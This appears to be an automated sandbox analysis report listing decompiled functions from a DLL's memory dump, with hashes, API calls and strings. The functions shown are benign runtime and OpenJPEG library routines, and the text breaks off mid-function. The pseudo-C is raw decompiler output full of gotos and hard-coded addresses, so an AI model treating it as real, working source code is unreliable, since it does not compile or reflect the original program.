Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleFileHandleTypeWriteswprintf
String ID: Assertion failed: %Ts, file %Ts, line %d
API String ID: 2943507729-1719349581
Opcode ID: c671c9f5f8cbbef94415cd1845bf8b4894ef7abf21c1504576988f208917e5ed
Instruction ID: 9f913d0cc2faa4501d0afbd1f86170735e26e643085867e40b163dfdadde4cdc
Opcode Fuzzy Hash: c671c9f5f8cbbef94415cd1845bf8b4894ef7abf21c1504576988f208917e5ed
Instruction Fuzzy Hash: 7A1138755007296BCB109BA5CC449EF77BCEF85614F70455DEA19A3294EB309E41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6EE3A552, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE3A552(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6ee78fb4 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6ee5d1a8 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6EE44055(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6ee3a559
0x6ee3a5cd
0x6ee3a55e
0x6ee3a560
0x6ee3a567
0x6ee3a56b
0x6ee3a574
0x6ee3a583
0x6ee3a58c
0x6ee3a590
0x6ee3a5d9
0x6ee3a5db
0x6ee3a5df
0x6ee3a5e2
0x6ee3a5e2
0x6ee3a5e8
0x6ee3a5e8
0x6ee3a5d4
0x6ee3a5d8
0x6ee3a5d8
0x6ee3a592
0x6ee3a59b
0x6ee3a5c5
0x6ee3a5c8
0x6ee3a5ca
0x6ee3a5ca
0x00000000
0x6ee3a5ca
0x6ee3a59d
0x6ee3a5a8
0x6ee3a5ad
0x6ee3a5b2
0x00000000
0x00000000
0x6ee3a5b9
0x6ee3a5bf
0x6ee3a5c3
0x00000000
0x00000000
0x00000000
0x6ee3a5c3
0x6ee3a570
0x00000000
0x00000000
0x00000000
0x6ee3a572
0x6ee3a5d2
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6EE3A613,00000000,?,00000001,00000000,?,6EE3A68A,00000001,FlsFree,6EE5D264,FlsFree,00000000), ref: 6EE3A5E2

Strings

api-ms-, xrefs: 6EE3A5A2

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: ed731cf546721a449ef36ac8d2abeedb5a48fc81165e52da52243f0bd16b45a0
Instruction ID: f8ea7ba8ab02a56b7f02ff50464ab835a276efbea122819b10a42e4f8bdad6f9
Opcode Fuzzy Hash: ed731cf546721a449ef36ac8d2abeedb5a48fc81165e52da52243f0bd16b45a0
Instruction Fuzzy Hash: 56119135A95E35BBDF528AE88840B4A37A49F02764F310750F918EB3C8D761E940C6D5

Uniqueness

Uniqueness Score: -1.00%

Function 6EE3AA16, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6EE3AA16(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6ee5714c(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6ee3aa1c
0x6ee3aa20
0x6ee3aa2b
0x6ee3aa33
0x6ee3aa3e
0x6ee3aa44
0x6ee3aa48
0x6ee3aa4f
0x6ee3aa55
0x6ee3aa55
0x6ee3aa57
0x6ee3aa5c
0x00000000
0x6ee3aa61
0x6ee3aa68

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6EE3A9C8,6EDCB255,?,6EE3A990,6EDCB255,?,6EDCB255), ref: 6EE3AA2B
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EE3AA3E
FreeLibrary.KERNEL32(00000000,?,?,6EE3A9C8,6EDCB255,?,6EE3A990,6EDCB255,?,6EDCB255), ref: 6EE3AA61

Strings

CorExitProcess, xrefs: 6EE3AA36
mscoree.dll, xrefs: 6EE3AA24

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 23ab904a53b8b9891b1070f4c92997ac8b6a3e3322b3e37f7bcdf47f59da9444
Instruction ID: b35c9bc0fb2c8038d2ec1937e2654de3e116f98320d518d913859f61aedb3d9f
Opcode Fuzzy Hash: 23ab904a53b8b9891b1070f4c92997ac8b6a3e3322b3e37f7bcdf47f59da9444
Instruction Fuzzy Hash: 4EF08C35950629FBDF01AB90CE09B9E7BB9EB01366F214060F544A2390CB328E50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6EE50FAA, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE50FAA(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6ee77b80; // 0x6ee77bd4
					if(_t23 != 0) {
						E6EE4471C(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6ee77b84; // 0x6ee79144
					if(_t24 != 0) {
						E6EE4471C(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6ee77b88; // 0x6ee79144
					if(_t25 != 0) {
						E6EE4471C(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6ee77bb0; // 0x6ee77bd8
					if(_t26 != 0) {
						E6EE4471C(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6ee77bb4; // 0x6ee79148
					if(_t27 != 0) {
						return E6EE4471C(_t6);
					}
				}
				return _t6;
			}

0x6ee50fb0
0x6ee50fb5
0x6ee50fb9
0x6ee50fbf
0x6ee50fc2
0x6ee50fc7
0x6ee50fcb
0x6ee50fd1
0x6ee50fd4
0x6ee50fd9
0x6ee50fdd
0x6ee50fe3
0x6ee50fe6
0x6ee50feb
0x6ee50fef
0x6ee50ff5
0x6ee50ff8
0x6ee50ffd
0x6ee50ffe
0x6ee51001
0x6ee51007
0x00000000
0x6ee5100f
0x6ee51007
0x6ee51012

APIs

_free.LIBCMT ref: 6EE50FC2

Part of subcall function 6EE4471C: RtlFreeHeap.NTDLL(00000000,00000000,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?), ref: 6EE44732
Part of subcall function 6EE4471C: GetLastError.KERNEL32(?,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?,?), ref: 6EE44744

_free.LIBCMT ref: 6EE50FD4
_free.LIBCMT ref: 6EE50FE6
_free.LIBCMT ref: 6EE50FF8
_free.LIBCMT ref: 6EE5100A

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 288ee0241f6d6b608c0bb816834ca791263d39a76d9272cc3cab97d16570584f
Instruction ID: 7423fdcb804e261c156590b8124766d0cb939995aed2ddb666f836f6d6e35585
Opcode Fuzzy Hash: 288ee0241f6d6b608c0bb816834ca791263d39a76d9272cc3cab97d16570584f
Instruction Fuzzy Hash: 20F08771218A159B8A80CED8E4D5C4B3BDEAB02328B340C0AF018D3784DB31F882CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4C480, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E6EE4C480(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				signed int _t41;
				signed int _t49;
				void* _t52;
				signed int _t56;
				void* _t60;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t68;
				intOrPtr* _t71;
				intOrPtr _t85;
				intOrPtr* _t91;
				intOrPtr _t93;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x6ee77a68; // 0xbfafeb97
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t68 = E6EE42779(_a16, _t93);
					_t103 = _t68 - _t93;
					_t4 = _t68 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t68;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t85 = E6EE4D1B6(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t85;
				if(_t85 == 0) {
					L39:
					return E6EE361A7(_v8 ^ _t96);
				} else {
					_t17 = _t85 + _t85 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t85 + _t85 & _t17;
					if(_t49 == 0) {
						_t71 = 0;
						L15:
						if(_t71 == 0) {
							L37:
							_t95 = 0;
							L38:
							E6EE35FB5(_t71);
							goto L39;
						}
						_t52 = E6EE4D1B6(_t88, 1, _a16, _t93, _t71, _t85);
						_t100 = _t98 + 0x18;
						if(_t52 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E6EE44F21(_a8, _a12, _t71, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t56 = _t95 + _t95 & _t31;
							if(_t56 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E6EE44F21(_a8, _a12, _t71, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E6EE35FB5(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t60 = E6EE4D232();
									_t95 = _t60;
									if(_t60 != 0) {
										E6EE35FB5(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t56 > 0x400) {
								_t91 = E6EE44756(_t56);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E6EE37060();
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t64 = E6EE44F21(_a8, _a12, _t71, _t90, _a24, _t63, 0, 0, 0);
						_t95 = _t64;
						if(_t64 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t71 = E6EE44756(_t49);
						if(_t71 == 0) {
							L13:
							_t85 = _v12;
							goto L15;
						}
						 *_t71 = 0xdddd;
						L12:
						_t71 = _t71 + 8;
						goto L13;
					}
					E6EE37060();
					_t71 = _t98;
					if(_t71 == 0) {
						goto L13;
					}
					 *_t71 = 0xcccc;
					goto L12;
				}
			}

0x6ee4c485
0x6ee4c486
0x6ee4c487
0x6ee4c48e
0x6ee4c493
0x6ee4c499
0x6ee4c49f
0x6ee4c4a5
0x6ee4c4a8
0x6ee4c4a8
0x6ee4c4ab
0x6ee4c4ad
0x6ee4c4ad
0x6ee4c4ab
0x6ee4c4af
0x6ee4c4b4
0x6ee4c4bb
0x6ee4c4be
0x6ee4c4be
0x6ee4c4df
0x6ee4c4e1
0x6ee4c4e4
0x6ee4c4e9
0x6ee4c647
0x6ee4c658
0x6ee4c4ef
0x6ee4c4f2
0x6ee4c4f7
0x6ee4c4f9
0x6ee4c4fb
0x6ee4c532
0x6ee4c534
0x6ee4c536
0x6ee4c63c
0x6ee4c63c
0x6ee4c63e
0x6ee4c63f
0x00000000
0x6ee4c645
0x6ee4c545
0x6ee4c54a
0x6ee4c54f
0x00000000
0x00000000
0x6ee4c555
0x6ee4c56c
0x6ee4c570
0x00000000
0x00000000
0x6ee4c57e
0x6ee4c5bb
0x6ee4c5c0
0x6ee4c5c2
0x6ee4c5c4
0x6ee4c5f5
0x6ee4c5f7
0x6ee4c5f9
0x6ee4c635
0x6ee4c636
0x00000000
0x6ee4c616
0x6ee4c618
0x6ee4c619
0x6ee4c61d
0x6ee4c659
0x6ee4c65c
0x6ee4c61f
0x6ee4c61f
0x6ee4c620
0x6ee4c620
0x6ee4c621
0x6ee4c622
0x6ee4c623
0x6ee4c624
0x6ee4c627
0x6ee4c62c
0x6ee4c633
0x6ee4c662
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee4c633
0x6ee4c5f9
0x6ee4c5c8
0x6ee4c5e3
0x6ee4c5e8
0x00000000
0x00000000
0x6ee4c5ea
0x6ee4c5f0
0x6ee4c5f0
0x00000000
0x6ee4c5f0
0x6ee4c5ca
0x6ee4c5cf
0x6ee4c5d3
0x00000000
0x00000000
0x6ee4c5d5
0x00000000
0x6ee4c5d5
0x6ee4c580
0x6ee4c585
0x00000000
0x00000000
0x6ee4c58d
0x00000000
0x00000000
0x6ee4c5a4
0x6ee4c5a9
0x6ee4c5ad
0x00000000
0x00000000
0x00000000
0x6ee4c5b3
0x6ee4c502
0x6ee4c51d
0x6ee4c522
0x6ee4c52d
0x6ee4c52d
0x00000000
0x6ee4c52d
0x6ee4c524
0x6ee4c52a
0x6ee4c52a
0x00000000
0x6ee4c52a
0x6ee4c504
0x6ee4c509
0x6ee4c50d
0x00000000
0x00000000
0x6ee4c50f
0x00000000
0x6ee4c50f

APIs

__freea.LIBCMT ref: 6EE4C636

Part of subcall function 6EE44756: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,6EE3612D,00000000,?,6EDB211C,00000000,?,6EDB1379,00000000), ref: 6EE44788

__freea.LIBCMT ref: 6EE4C63F
__freea.LIBCMT ref: 6EE4C662

Strings

n, xrefs: 6EE4C492

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea$AllocateHeap
String ID: n
API String ID: 2243444508-2987474338
Opcode ID: 6020d65b66e5536881da5d524947a2d2ff55e04264fc04fe3bd9e9479bfdd970
Instruction ID: dd9b5ad26587472f5fa94ff8c6bfc593e3587de7139b21a5f38bd3d8ea9a96dd
Opcode Fuzzy Hash: 6020d65b66e5536881da5d524947a2d2ff55e04264fc04fe3bd9e9479bfdd970
Instruction Fuzzy Hash: B451B172710217EFFB108EE4FC40EAB36A9EB44758F314569FD149B250E735DC1686A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB26F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6EDB26F0(intOrPtr* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _v16;
				char _v17;
				char _v18;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v40;
				char _v64;
				char _v88;
				intOrPtr _t67;
				intOrPtr _t73;

				_push(0xffffffff);
				_push(E6EE56075);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_v24 = __ecx;
				E6EDB18A0( &_v64, __eflags, "a");
				_v8 = 0;
				_t67 = _v24;
				_t78 =  *_v24 + 1 -  *((intOrPtr*)(_t67 + 4));
				if( *_v24 + 1 >  *((intOrPtr*)(_t67 + 4))) {
					E6EDB1B70( &_v40, "#11");
					E6EE37B80( &_v40, 0x6ee67f10);
				}
				_v28 = E6EDB2A10(_v24, _t78,  &_v88,  *((intOrPtr*)(_v24 + 4)));
				_v32 = _v28;
				_v8 = 1;
				E6EDB1FB0( &_v64, _v32);
				_v8 = 0;
				E6EDB1D80( &_v88);
				_v17 =  *((intOrPtr*)( *((intOrPtr*)(_v24 + 8)) +  *_v24));
				 *_v24 =  *_v24 + 1;
				_push(E6EDB2660( &_v64));
				E6EDB1340(_t45);
				_v18 = _v17;
				_v8 = 0xffffffff;
				E6EDB1D80( &_v64);
				 *[fs:0x0] = _v16;
				return _v18;
			}

0x6edb26f3
0x6edb26f5
0x6edb2700
0x6edb2701
0x6edb270b
0x6edb2716
0x6edb271b
0x6edb272a
0x6edb272d
0x6edb2730
0x6edb273a
0x6edb2748
0x6edb2748
0x6edb2760
0x6edb2766
0x6edb2769
0x6edb2774
0x6edb2779
0x6edb2780
0x6edb2793
0x6edb27a1
0x6edb27ab
0x6edb27ac
0x6edb27b7
0x6edb27ba
0x6edb27c4
0x6edb27cf
0x6edb27d9

APIs

std::locale::facet::facet.LIBCPMTD ref: 6EDB273A

Part of subcall function 6EE37B80: RaiseException.KERNEL32(E06D7363,00000001,00000003,6EE370C5,?,?,?,6EE370C5,?,6EE67E9C), ref: 6EE37BE0

task.LIBCPMTD ref: 6EDB2780
task.LIBCPMTD ref: 6EDB27C4

Strings

#11, xrefs: 6EDB2732

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task$ExceptionRaisestd::locale::facet::facet
String ID: #11
API String ID: 2223519425-1388914211
Opcode ID: 971bda084fb56f48a570fca8adf5a63d17377a6625d40ac4e2f418245e19c679
Instruction ID: d9951d862475bb455f8baca6974b8e14c2ed3a22a57f03dd9c86f781605be60e
Opcode Fuzzy Hash: 971bda084fb56f48a570fca8adf5a63d17377a6625d40ac4e2f418245e19c679
Instruction Fuzzy Hash: BB311EB5D00149EFCB05DFD4D590AEEFBB8AF05314F248598D4527B390EB35AA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDEDED0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E6EDEDED0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed int _t26;

				_v16 = E6EE3F9F9(__ebx, __edi, __esi, __eflags, "OPJ_NUM_THREADS");
				if(_v16 == 0 ||  *0x6ee67170() == 0) {
					return 0;
				} else {
					_v8 =  *0x6ee67174();
					_t22 = E6EE3E510(_v16, "ALL_CPUS");
					__eflags = _t22;
					if(_t22 != 0) {
						__eflags = _v8;
						if(_v8 == 0) {
							_v8 = 0x20;
						}
						_v12 = E6EE3F8EA(_v16, _v16);
						__eflags = _v12;
						if(_v12 >= 0) {
							__eflags = _v12 - _v8 << 1;
							if(_v12 > _v8 << 1) {
								_t26 = _v8 << 1;
								__eflags = _t26;
								_v12 = _t26;
							}
						} else {
							_v12 = 0;
						}
						return _v12;
					}
					return _v8;
				}
			}

0x6ededee3
0x6ededeea
0x00000000
0x6ededefa
0x6ededf00
0x6ededf0c
0x6ededf14
0x6ededf16
0x6ededf1d
0x6ededf21
0x6ededf23
0x6ededf23
0x6ededf36
0x6ededf39
0x6ededf3d
0x6ededf4d
0x6ededf50
0x6ededf55
0x6ededf55
0x6ededf57
0x6ededf57
0x6ededf3f
0x6ededf3f
0x6ededf3f
0x00000000
0x6ededf5a
0x00000000
0x6ededf18

APIs

_opj_has_thread_support@0.BCCW1XUJAH ref: 6EDEDEEC
_opj_get_num_cpus@0.BCCW1XUJAH ref: 6EDEDEFA

Strings

OPJ_NUM_THREADS, xrefs: 6EDEDED6
ALL_CPUS, xrefs: 6EDEDF03

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _opj_get_num_cpus@0_opj_has_thread_support@0
String ID: ALL_CPUS$OPJ_NUM_THREADS
API String ID: 891234176-1994205374
Opcode ID: 38581c90c18b607df7c5ac59b578bd13c39a63185eb2f2814550e3497094cae1
Instruction ID: 371f43a93ef73d8a75f8c62f830c258da21c806b7e264c49a7f63c012d7cc6f1
Opcode Fuzzy Hash: 38581c90c18b607df7c5ac59b578bd13c39a63185eb2f2814550e3497094cae1
Instruction Fuzzy Hash: 481105B0D04208EBDB44DFF9D94878EBBB4AF80309F2085A9E815A6684EB749A45CF41

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4591A, Relevance: 6.3, APIs: 4, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6EE4591A(void* __edx, void* __fp0, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;
				void* _t188;

				_t188 = __fp0;
				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				 *_t177 = 0;
				E6EE3B82D( &_v60, _t163, _t188, _a36);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
							_t165 = _t177 + 1;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t178 =  &(_t165[0]);
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E6EE36230( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E6EE46135(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t118 = _t178 - 1;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E6EE38EC0(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
